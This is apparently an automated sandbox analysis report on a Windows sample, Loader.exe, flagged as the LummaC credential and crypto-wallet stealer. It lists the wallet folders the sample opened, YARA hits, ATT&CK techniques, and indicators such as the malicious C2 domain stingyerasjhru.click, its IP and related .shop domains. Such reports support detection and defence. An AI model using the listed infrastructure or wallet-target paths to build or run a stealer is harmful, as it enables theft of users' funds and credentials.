Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior

Source: Yara match	File source: 00000003.00000003.91105435551.000000000340D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.91127781720.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.91105517341.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.91780179524.00000000033B4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.96103081032.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.91118614146.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.91105992992.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.91778616538.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Loader.exe PID: 1980, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Loader.exe PID: 1980, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	21 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	211 Process Injection	LSASS Memory	241 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	41 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	3 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	11 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	33 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Loader.exe	30%	ReversingLabs	Win32.Trojan.Generic
Loader.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://stingyerasjhru.click/apibca	100%	Avira URL Cloud	malware
https://stingyerasjhru.click/api=	100%	Avira URL Cloud	malware
https://stingyerasjhru.click/sqg	100%	Avira URL Cloud	malware
https://stingyerasjhru.click/api	100%	Avira URL Cloud	malware
https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE	0%	Avira URL Cloud	safe
https://stingyerasjhru.click/apiqS	100%	Avira URL Cloud	malware
https://stingyerasjhru.click/apitreak	100%	Avira URL Cloud	malware
https://stingyerasjhru.click/apintOS	100%	Avira URL Cloud	malware
https://stingyerasjhru.click/Vg	100%	Avira URL Cloud	malware
https://stingyerasjhru.click/apiC	100%	Avira URL Cloud	malware
http://ocsp.pki.	0%	Avira URL Cloud	safe
https://www.google.c(om/	0%	Avira URL Cloud	safe
stingyerasjhru.click	100%	Avira URL Cloud	malware
https://stingyerasjhru.click/xg	100%	Avira URL Cloud	malware
https://stingyerasjhru.click/	100%	Avira URL Cloud	malware
https://stingyerasjhru.click/Rd	100%	Avira URL Cloud	malware
https://stingyerasjhru.click/F	100%	Avira URL Cloud	malware
https://stingyerasjhru.click/C	100%	Avira URL Cloud	malware
rabidcowse.shop	100%	Avira URL Cloud	malware
https://stingyerasjhru.click/T	100%	Avira URL Cloud	malware
https://stingyerasjhru.click/aRd	100%	Avira URL Cloud	malware
https://stingyerasjhru.click/m$g	100%	Avira URL Cloud	malware
wholersorie.shop	100%	Avira URL Cloud	malware
https://stingyerasjhru.click/Og	100%	Avira URL Cloud	malware
http://ocsp.rootca1.amazontrust.com0:	0%	Avira URL Cloud	safe
https://stingyerasjhru.click/e	100%	Avira URL Cloud	malware
cloudewahsj.shop	100%	Avira URL Cloud	malware
https://stingyerasjhru.click/apir	100%	Avira URL Cloud	malware
noisycuttej.shop	100%	Avira URL Cloud	malware
https://stingyerasjhru.click/apie	100%	Avira URL Cloud	malware
http://crl.micro	0%	Avira URL Cloud	safe
nearycrepso.shop	100%	Avira URL Cloud	malware
https://stingyerasjhru.click/bxg	100%	Avira URL Cloud	malware
https://stingyerasjhru.click/apiV	100%	Avira URL Cloud	malware
https://stingyerasjhru.click/s	100%	Avira URL Cloud	malware
tirepublicerj.shop	100%	Avira URL Cloud	malware
https://stingyerasjhru.click/apior	100%	Avira URL Cloud	malware
https://stingyerasjhru.click/apiP	100%	Avira URL Cloud	malware
framekgirus.shop	100%	Avira URL Cloud	malware
abruptyopsn.shop	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
stingyerasjhru.click	172.67.157.249	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://stingyerasjhru.click/api	true	Avira URL Cloud: malware	unknown
stingyerasjhru.click	true	Avira URL Cloud: malware	unknown
rabidcowse.shop	true	Avira URL Cloud: malware	unknown
wholersorie.shop	true	Avira URL Cloud: malware	unknown
cloudewahsj.shop	true	Avira URL Cloud: malware	unknown
noisycuttej.shop	true	Avira URL Cloud: malware	unknown
nearycrepso.shop	true	Avira URL Cloud: malware	unknown
framekgirus.shop	true	Avira URL Cloud: malware	unknown
tirepublicerj.shop	true	Avira URL Cloud: malware	unknown
abruptyopsn.shop	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	Loader.exe, 00000003.00000003.91061190974.0000000005E95000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91075395661.000000000604C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91074970558.0000000005E65000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/chrome/next-steps.html?brand=CHWL&statcb=0&installdataindex=empty&defaultbrow	Loader.exe, 00000003.00000003.91062160822.0000000006032000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91062160822.000000000604D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search	Loader.exe, 00000003.00000003.91061190974.0000000005E95000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91075395661.000000000604C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91074970558.0000000005E65000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	Loader.exe, 00000003.00000003.91074970558.0000000005E65000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/download	Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stingyerasjhru.click/api=	Loader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://stingyerasjhru.click/Vg	Loader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91127432350.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://stingyerasjhru.click/apiC	Loader.exe, 00000003.00000003.91781075623.0000000003399000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91778841405.0000000003399000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.96103019944.000000000339C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_	Loader.exe, 00000003.00000003.91062160822.0000000006032000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91062160822.000000000604D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE	Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://stingyerasjhru.click/sqg	Loader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91127432350.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://stingyerasjhru.click/apintOS	Loader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com/https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-n	Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pki.goog/repo/certs/gtsr1.der04	Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stingyerasjhru.click/apiqS	Loader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	Loader.exe, 00000003.00000003.91061190974.0000000005E95000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stingyerasjhru.click/apibca	Loader.exe, 00000003.00000003.91074609704.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91074354314.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301	Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stingyerasjhru.click/apitreak	Loader.exe, 00000003.00000003.91074609704.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91074354314.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.eicar.org/download-anti-malware-testfile/:	Loader.exe, 00000003.00000003.91062160822.000000000604D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttp	Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Loader.exe, 00000003.00000003.91061190974.0000000005E95000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91075395661.000000000604C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91074970558.0000000005E65000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B9AB9339B	Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.pki.	Loader.exe, 00000003.00000003.91088526468.0000000005E79000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570	Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://secure.eicar.org/eicar.com;	Loader.exe, 00000003.00000003.91062160822.000000000604D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.c(om/	Loader.exe, 00000003.00000003.91061973141.0000000005E8B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://stingyerasjhru.click/xg	Loader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292K	Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stingyerasjhru.click/	Loader.exe, 00000003.00000003.91778448742.00000000033F5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91778448742.0000000003428000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://stingyerasjhru.click/Rd	Loader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91127432350.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://secure.eicar.org/eicar.com.txtD	Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bT	Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stingyerasjhru.click/F	Loader.exe, 00000003.00000003.91058782608.00000000033B1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ocsp.quovadisoffshore.com0	Loader.exe, 00000003.00000003.91127781720.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91105517341.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91058782608.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.96103081032.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91780179524.00000000033B4000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91118614146.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91778616538.00000000033B1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://stingyerasjhru.click/C	Loader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Loader.exe, 00000003.00000003.91075395661.000000000604C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91074970558.0000000005E65000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stingyerasjhru.click/T	Loader.exe, 00000003.00000003.91058782608.00000000033B1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://stingyerasjhru.click/aRd	Loader.exe, 00000003.00000003.91100553133.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://secure.eicar.org/eicar.com	Loader.exe, 00000003.00000003.91062160822.0000000006032000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stingyerasjhru.click/m$g	Loader.exe, 00000003.00000003.91100553133.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe	Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Loader.exe, 00000003.00000003.91074970558.0000000005E65000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.pki.goog/gtsr1/gtsr1.crl0W	Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stingyerasjhru.click/Og	Loader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91127432350.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ocsp.rootca1.amazontrust.com0:	Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://pki.goog/repository/0	Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://secure.eicar.org/eicar.com.txt/	Loader.exe, 00000003.00000003.91062160822.0000000006032000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	Loader.exe, 00000003.00000003.91061190974.0000000005E95000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/search?q=eicar	Loader.exe, 00000003.00000003.91062160822.0000000006032000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91062160822.000000000604D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://secure.eicar.org/eicar.com/	Loader.exe, 00000003.00000003.91062160822.0000000006032000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stingyerasjhru.click/e	Loader.exe, 00000003.00000003.91100553133.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://stingyerasjhru.click/apir	Loader.exe, 00000003.00000003.91100553133.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ac.ecosia.org/autocomplete?q=	Loader.exe, 00000003.00000003.91061190974.0000000005E95000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.eicar.org/download-anti-malware-testfile/Download	Loader.exe, 00000003.00000003.91062160822.0000000006032000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stingyerasjhru.click/apie	Loader.exe, 00000003.00000003.91118175734.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.micro	Loader.exe, 00000003.00000003.91127781720.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91105517341.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91058782608.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91118614146.00000000033B1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://stingyerasjhru.click/s	Loader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://stingyerasjhru.click/bxg	Loader.exe, 00000003.00000003.91100553133.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stingyerasjhru.click/apiV	Loader.exe, 00000003.00000003.91127432350.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91118175734.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/en-GB/products/firefoxgro.allizom.troppus.	Loader.exe, 00000003.00000003.91089795795.0000000006398000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.quovadis.bm0	Loader.exe, 00000003.00000003.91127781720.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91105517341.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91058782608.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.96103081032.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91780179524.00000000033B4000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91118614146.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91778616538.00000000033B1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeQ	Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/en-GB/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=fire	Loader.exe, 00000003.00000003.91089795795.0000000006398000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.eicar.org/https://eicar.org/https://www.eicar.org/download-anti-malware-testfile/https:/	Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Loader.exe, 00000003.00000003.91061190974.0000000005E95000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gemini.google.com/app?q=	Loader.exe, 00000003.00000003.91061190974.0000000005E95000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stingyerasjhru.click/apiP	Loader.exe, 00000003.00000003.91058782608.00000000033B1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://stingyerasjhru.click/apior	Loader.exe, 00000003.00000003.91100553133.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://secure.eicar.org/eicar.com.txt	Loader.exe, 00000003.00000003.91062160822.0000000006032000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91062160822.000000000604D000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.157.249	stingyerasjhru.click	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582869
Start date and time:	2024-12-31 17:40:18 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Loader.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/0@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 49 Number of non-executed functions: 98
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Loader.exe

Simulations

Behavior and APIs

Time	Type	Description
11:50:29	API Interceptor	3066076x Sleep call for process: Loader.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.157.249	NewSetup.exe	Get hash	malicious	LummaC	Browse
172.67.157.249	http://www.akagustos-kampanyasizlerle1.cloud/	Get hash	malicious	HTMLPhisher	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
stingyerasjhru.click	NewSetup.exe	Get hash	malicious	LummaC	Browse	172.67.157.249
stingyerasjhru.click	launcher.exe	Get hash	malicious	LummaC	Browse	104.21.58.80

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	PASS-1234.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
